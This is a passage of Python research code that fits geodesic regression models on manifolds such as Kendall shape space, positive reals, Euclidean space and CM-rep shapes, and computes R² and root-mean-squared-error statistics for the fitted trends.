w_d_np = np.asarray( w_list[ k * nManifoldDim + d ] )
LS_model_d = sm.OLS( w_d_np, t_list_sm )
est_d = LS_model_d.fit(method='qr')
# est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
v_tangent_on_p_anchor = manifolds.kendall2D_tVec( nManifoldDim )
v_to_base_on_p_anchor = manifolds.kendall2D_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ 0, d ] = estModel_list[ d ].params[ 0 ]
v_to_base_on_p_anchor.tVector[ 1, d ] = estModel_list[ nManifoldDim + d ].params[ 0 ]
if len( estModel_list[ d ].params ) < 2:
v_tangent_on_p_anchor.tVector[ 0, d ] = 0
else:
v_tangent_on_p_anchor.tVector[ 0, d ] = estModel_list[ d ].params[ 1 ]
if len( estModel_list[ nManifoldDim + d ].params ) < 2:
v_tangent_on_p_anchor.tVector[ 1, d ] = 0
else:
v_tangent_on_p_anchor.tVector[ 1, d ] = estModel_list[ nManifoldDim + d ].params[ 1 ]
# print( "Anchor point to base" )
# print( v_to_base_on_p_anchor.tVector )
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
newTangent = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor )
energy = 0
for n in range( nData ):
time_pt = t_list[ n ]
target = pt_list[ n ]
current_tangent = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
current_tangent.tVector[ k, d ] = newTangent.tVector[ k, d ] * time_pt
estimate_n = newBase.ExponentialMap( current_tangent )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break;
else:
prevBase = newBase
prevTangent = newTangent
p_anchor = newBase
base = newBase
tangent = newTangent
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent
def LinearizedGeodesicRegression_PosReal( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nData = len( pt_list )
if verbose:
print( "======================================================" )
print( " Data on Anchor Point Tangent Vector Space " )
print( "======================================================" )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( pt_list )
else:
p_anchor = pt_list[ 0 ]
nManifoldDim = p_anchor.nDim
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( pt_list[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
estModel_list = []
for d in range( nManifoldDim ):
t_list_sm = sm.add_constant( t_list )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, t_list_sm )
est_d = LS_model_d.fit(method='qr')
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
v_tangent_on_p_anchor = manifolds.pos_real_tVec( nManifoldDim )
v_to_base_on_p_anchor = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 1 ]
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
base = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
tangent = p_anchor.ParallelTranslateAtoB( p_anchor, base, v_tangent_on_p_anchor )
p_anchor = base
return base, tangent
def LinearizedGeodesicRegression_Euclidean( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nData = len( pt_list )
if verbose:
print( "======================================================" )
print( " Data on Anchor Point Tangent Vector Space " )
print( "======================================================" )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( pt_list )
else:
t_min_idx = np.argmin( t_list )
p_anchor = pt_list[ t_min_idx ]
nManifoldDim = p_anchor.nDim
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( pt_list[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
estModel_list = []
for d in range( nManifoldDim ):
t_list_sm = sm.add_constant( t_list )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, t_list_sm )
est_d = LS_model_d.fit(method='qr')
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
v_tangent_on_p_anchor = manifolds.euclidean_tVec( nManifoldDim )
v_to_base_on_p_anchor = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 1 ]
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
base = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
tangent = p_anchor.ParallelTranslateAtoB( p_anchor, base, v_tangent_on_p_anchor )
p_anchor = base
return base, tangent
def LinearizedGeodesicRegression_CMRep( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nManDim = pt_list[ 0 ].nDim
base = manifolds.cmrep( nManDim )
tangent = manifolds.cmrep_tVec( nManDim )
nData = len( pt_list )
for i in range( nManDim ):
pt_list_pos_i = []
pt_list_rad_i = []
for j in range( nData ):
pt_list_pos_i.append( pt_list[ j ].pt[ i ][ 0 ] )
pt_list_rad_i.append( pt_list[ j ].pt[ i ][ 1 ] )
t_list_pos_i = list( t_list )
t_list_rad_i = list( t_list )
base_pos_i, tangent_pos_i = LinearizedGeodesicRegression( t_list_pos_i, pt_list_pos_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, False )
base_rad_i, tangent_rad_i = LinearizedGeodesicRegression( t_list_rad_i, pt_list_rad_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, False )
base.SetPosition( i, base_pos_i.pt )
base.SetRadius( i, base_rad_i.pt )
tangent.SetPositionTangentVector( i, tangent_pos_i.tVector )
tangent.SetRadiusTangentVector( i, tangent_rad_i.tVector )
return base, tangent
def LinearizedGeodesicRegression_CMRep_Abstract( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nManDim = pt_list[ 0 ].nDim
base = manifolds.cmrep_abstract( nManDim )
tangent = manifolds.cmrep_abstract_tVec( nManDim )
nData = len( pt_list )
base_pt_arr = []
tangent_tVec_arr = []
for i in range( 4 ):
pt_list_i = []
t_list_i = list( t_list )
for j in range( nData ):
pt_list_i.append( pt_list[ j ].pt[ i ] )
base_i, tangent_i = LinearizedGeodesicRegression( t_list_i, pt_list_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
base_pt_arr.append( base_i )
tangent_tVec_arr.append( tangent_i )
base.SetPoint( base_pt_arr )
tangent.SetTangentVector( tangent_tVec_arr )
base.UpdateMeanRadius()
return base, tangent
def LinearizedGeodesicRegression_CMRep_Abstract_Normal( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nManDim = pt_list[ 0 ].nDim
base = manifolds.cmrep_abstract_normal( nManDim )
tangent = manifolds.cmrep_abstract_normal_tVec( nManDim )
nData = len( pt_list )
base_pt_arr = []
tangent_tVec_arr = []
for i in range( 4 ):
pt_list_i = []
t_list_i = list( t_list )
for j in range( nData ):
pt_list_i.append( pt_list[ j ].pt[ i ] )
base_i, tangent_i = LinearizedGeodesicRegression( t_list_i, pt_list_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
base_pt_arr.append( base_i )
tangent_tVec_arr.append( tangent_i )
base_normal1_arr = []
base_normal2_arr = []
tangent_normal1_arr = []
tangent_normal2_arr = []
for i in range( nManDim ):
pt_normal1_list_i = []
pt_normal2_list_i = []
t_list1_i = list( t_list )
t_list2_i = list( t_list )
for j in range( nData ):
pt_normal1_list_i.append( pt_list[ j ].pt[ 4 ][ i ] )
pt_normal2_list_i.append( pt_list[ j ].pt[ 5 ][ i ] )
base_normal1_i, tangent_normal1_i = LinearizedGeodesicRegression( t_list1_i, pt_normal1_list_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
base_normal2_i, tangent_normal2_i = LinearizedGeodesicRegression( t_list2_i, pt_normal2_list_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
base_normal1_arr.append( base_normal1_i )
base_normal2_arr.append( base_normal2_i )
tangent_normal1_arr.append( tangent_normal1_i )
tangent_normal2_arr.append( tangent_normal2_i )
base_pt_arr.append( base_normal1_arr )
base_pt_arr.append( base_normal2_arr )
tangent_tVec_arr.append( tangent_normal1_arr )
tangent_tVec_arr.append( tangent_normal2_arr )
base.SetPoint( base_pt_arr )
tangent.SetTangentVector( tangent_tVec_arr )
base.UpdateMeanRadius()
return base, tangent
def LinearizedGeodesicRegression_Scale_Kendall2D( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nManDim = pt_list[ 0 ].nPt
base = manifolds.scale_kendall2D( nManDim )
tangent = manifolds.scale_kendall2D_tVec( nManDim )
nData = len( pt_list )
base_pt_arr = []
tangent_tVec_arr = []
for i in range( 2 ):
pt_list_i = []
t_list_i = list( t_list )
for j in range( nData ):
pt_list_i.append( pt_list[ j ].pt[ i ] )
base_i, tangent_i = LinearizedGeodesicRegression( t_list_i, pt_list_i, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
base_pt_arr.append( base_i )
tangent_tVec_arr.append( tangent_i )
base.SetPoint( base_pt_arr )
tangent.SetTangentVector( tangent_tVec_arr )
return base, tangent
####################################################################
### Statistical Validations ###
####################################################################
# R2 Statistics
def R2Statistics( t_list, pt_list, base, tangent ):
if base.Type == "Sphere":
return R2Statistics_Sphere( t_list, pt_list, base, tangent )
elif base.Type == "PositiveReal":
return R2Statistics_PosReal( t_list, pt_list, base, tangent )
elif base.Type == "Euclidean":
return R2Statistics_Euclidean( t_list, pt_list, base, tangent )
elif base.Type == "CMRep":
return R2Statistics_CMRep( t_list, pt_list, base, tangent )
elif base.Type == "CMRep_Abstract":
return R2Statistics_CMRep_Abstract( t_list, pt_list, base, tangent )
else:
print( "Manifold Type Unknown" )
return -1
def R2Statistics_Mu( t_list, pt_list, base, tangent, mu ):
if base.Type == "Sphere":
return R2Statistics_Mu_Sphere( t_list, pt_list, base, tangent, mu )
elif base.Type == "PositiveReal":
return R2Statistics_Mu_PosReal( t_list, pt_list, base, tangent, mu )
elif base.Type == "Euclidean":
return R2Statistics_Mu_Euclidean( t_list, pt_list, base, tangent, mu )
# elif base.Type == "CMRep":
# return R2Statistics_CMRep( t_list, pt_list, base, tangent, mu )
# elif base.Type == "CMRep_Abstract":
# return R2Statistics_CMRep_Abstract( t_list, pt_list, base, tangent, mu )
else:
print( "Manifold Type Unknown" )
return -1
def R2Statistics_Sphere( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t esitmated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_Mu_Sphere( t_list, pt_list, base, tangent, mu ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
# mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t esitmated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_PosReal( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t esitmated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_Mu_PosReal( t_list, pt_list, base, tangent, mu ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
# mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t esitmated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_Euclidean( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t esitmated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_Mu_Euclidean( t_list, pt_list, base, tangent, mu ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
# mu = FrechetMean( pt_list )
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t esitmated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_CMRep( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
mu = FrechetMean( pt_list )
mu.UpdateMeanRadius()
var_mu = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
tVec_mu_to_y_i.SetMeanRadius( mu.meanRadius )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t esitmated geodesic
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.cmrep_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 0 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 0 ] * t_i )
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 1 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 1 ] * t_i )
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 2 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 2 ] * t_i )
tVec_at_t_i.tVector[ d ][ 1 ].tVector[ 0 ] = ( tangent.tVector[ d ][ 1 ].tVector[ 0 ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
est_pt_at_t_i.UpdateMeanRadius()
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
tVec_est_to_y_i.SetMeanRadius( est_pt_at_t_i.meanRadius )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
return R2
def R2Statistics_CMRep_Abstract( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# Calculate intrinsic mean
print( "Calculating Frechet Mean... " )
mu = FrechetMean( pt_list )
mu.UpdateMeanRadius()
var_mu = 0
print( "Calculating Variance..." )
mean_area_s = 0
mean_radius = 0
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ i ] )
tVec_mu_to_y_i.SetMeanRadius( mu.meanRadius )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
mean_area_s += ( pt_list[ i ].pt[ 1 ].pt[ 0 ] / float( nData ) )
pt_list[ i ].UpdateMeanRadius()
mean_radius += pt_list[ i ].meanRadius
print( "Data Variance w.r.t Frechet Mean" )
print( var_mu )
# Explained Variance w.r.t esitmated geodesic
print( "Calculating Variance w.r.t Estimated....")
var_est = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = tangent.ScalarMultiply( t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
est_pt_at_t_i.UpdateMeanRadius()
est_pt_at_t_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
tVec_est_to_y_i.SetMeanRadius( mean_radius )
tVec_est_to_y_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
print( "Data Variance w.r.t Estimated Trend" )
print( var_est )
return R2
def R2Statistics_CMRep_Abstract_Array( t_list, pt_list, base, tangent ):
nObject = len( pt_list )
nData = len( pt_list[0] )
nManifoldDim = pt_list[0][ 0 ].nDim
var_mu = 0
var_est = 0
for n in range( nObject ):
mean_area_s = 0
mean_radius = 0
for i in range( nData ):
mean_area_s += ( pt_list[ n ][ i ].pt[ 1 ].pt[ 0 ] / float( nData ) )
pt_list[ n ][ i ].UpdateMeanRadius()
mean_radius += ( pt_list[n][ i ].meanRadius / float( nData ) )
print( "Mean Area" )
print( mean_area_s )
print( "Mean Radius" )
print( mean_radius )
# Calculate intrinsic mean
print( "Calculating Frechet Mean... " )
mu = FrechetMean( pt_list[ n ] )
mu.UpdateMeanRadius()
print( "Calculating Variance..." )
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ n ][ i ] )
tVec_mu_to_y_i.SetMeanRadius( mean_radius )
tVec_mu_to_y_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t esitmated geodesic
print( "Calculating Variance w.r.t Estimated....")
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = tangent[ n ].ScalarMultiply( t_i )
est_pt_at_t_i = base[ n ].ExponentialMap( tVec_at_t_i )
est_pt_at_t_i.UpdateMeanRadius()
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ n ][ i ] )
tVec_est_to_y_i.SetMeanRadius( mean_radius )
tVec_est_to_y_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
print( "Data Variance w.r.t Frechet Mean" )
print( var_mu )
print( "Data Variance w.r.t Estimated Trend" )
print( var_est )
return R2
def R2Statistics_CMRep_Abstract_Normal_Array( t_list, pt_list, meanArray, base, tangent ):
nObject = len( pt_list )
nData = len( pt_list[0] )
nManifoldDim = pt_list[0][ 0 ].nDim
var_mu = 0
var_est = 0
for n in range( nObject ):
mean_area_s = 0
mean_radius = 0
for i in range( nData ):
mean_area_s += ( pt_list[ n ][ i ].pt[ 1 ].pt[ 0 ] / float( nData ) )
pt_list[ n ][ i ].UpdateMeanRadius()
mean_radius += ( pt_list[n][ i ].meanRadius / float( nData ) )
print( "Mean Area" )
print( mean_area_s )
print( "Mean Radius" )
print( mean_radius )
# Calculate intrinsic mean
print( "Calculating Frechet Mean... " )
mu = meanArray[ n ]
mu.UpdateMeanRadius()
print( "Calculating Variance..." )
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ n ][ i ] )
tVec_mu_to_y_i.SetMeanRadius( mean_radius )
tVec_mu_to_y_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t esitmated geodesic
print( "Calculating Variance w.r.t Estimated....")
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = tangent[ n ].ScalarMultiply( t_i )
est_pt_at_t_i = base[ n ].ExponentialMap( tVec_at_t_i )
est_pt_at_t_i.UpdateMeanRadius()
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ n ][ i ] )
tVec_est_to_y_i.SetMeanRadius( mean_radius )
tVec_est_to_y_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
print( "Data Variance w.r.t Frechet Mean" )
print( var_mu )
print( "Data Variance w.r.t Estimated Trend" )
print( var_est )
return R2
def RootMeanSquaredError( t_list, pt_list, base, tangent ):
if base.Type == "Sphere":
return RootMeanSquaredError_Sphere( t_list, pt_list, base, tangent )
elif base.Type == "PositiveReal":
return RootMeanSquaredError_PosReal( t_list, pt_list, base, tangent )
elif base.Type == "Euclidean":
return RootMeanSquaredError_Euclidean( t_list, pt_list, base, tangent )
elif base.Type == "CMRep":
return RootMeanSquaredError_CMRep( t_list, pt_list, base, tangent )
elif base.Type == "CMRep_Abstract":
return RootMeanSquaredError_CMRep_Abstract( t_list, pt_list, base, tangent )
else:
print( "Manifold Type Unknown" )
return -1
def RootMeanSquaredError_Sphere( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# RMSE w.r.t esitmated geodesic
rmse = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
rmse = np.sqrt( rmse )
return rmse
def RootMeanSquaredError_PosReal( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# RMSE w.r.t esitmated geodesic
rmse = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
rmse = np.sqrt( rmse )
return rmse
def RootMeanSquaredError_Euclidean( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# RMSE w.r.t esitmated geodesic
rmse = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
rmse = np.sqrt( rmse )
return rmse
def RootMeanSquaredError_CMRep( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# RMSE w.r.t esitmated geodesic
rmse = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.cmrep_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 0 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 0 ] * t_i )
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 1 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 1 ] * t_i )
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 2 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 2 ] * t_i )
tVec_at_t_i.tVector[ d ][ 1 ].tVector[ 0 ] = ( tangent.tVector[ d ][ 1 ].tVector[ 0 ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
rmse = np.sqrt( rmse )
return rmse
def RootMeanSquaredError_CMRep_Abstract( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# RMSE w.r.t esitmated geodesic
rmse = 0
mean_area_s = 0
mean_radius = 0
for i in range( nData ):
mean_area_s += ( pt_list[ i ].pt[ 1 ].pt[ 0 ] / float( nData ) )
pt_list[ i ].UpdateMeanRadius()
mean_radius += ( pt_list[ i ].meanRadius / float( nData ) )
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.cmrep_abstract_tVec( nManifoldDim )
for j in range( 4 ):
tVec_at_t_i.tVector[ j ] = tangent.tVector[ j ].ScalarMultiply( t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
tVec_est_to_y_i.SetMeanScale( mean_area_s ** (1.0 / 3.0 ) )
tVec_est_to_y_i.SetMeanRadius( mean_radius )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
return np.sqrt( rmse )
def RootMeanSquaredError_CMRep_Abstract_Array( t_list, pt_list, base, tangent ):
nObject = len( pt_list )
nData = len( pt_list[0] )
nManifoldDim = pt_list[0][ 0 ].nDim
rmse = 0
for n in range( nObject ):
mean_area_s = 0
mean_radius = 0
for i in range( nData ):
mean_area_s += ( pt_list[ n ][ i ].pt[ 1 ].pt[ 0 ] / float( nData ) )
pt_list[ n ][ i ].UpdateMeanRadius()
mean_radius += ( pt_list[n][ i ].meanRadius / float( nData ) )
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = tangent[ n ].ScalarMultiply( t_i )
est_pt_at_t_i = base[ n ].ExponentialMap( tVec_at_t_i )
est_pt_at_t_i.UpdateMeanRadius()
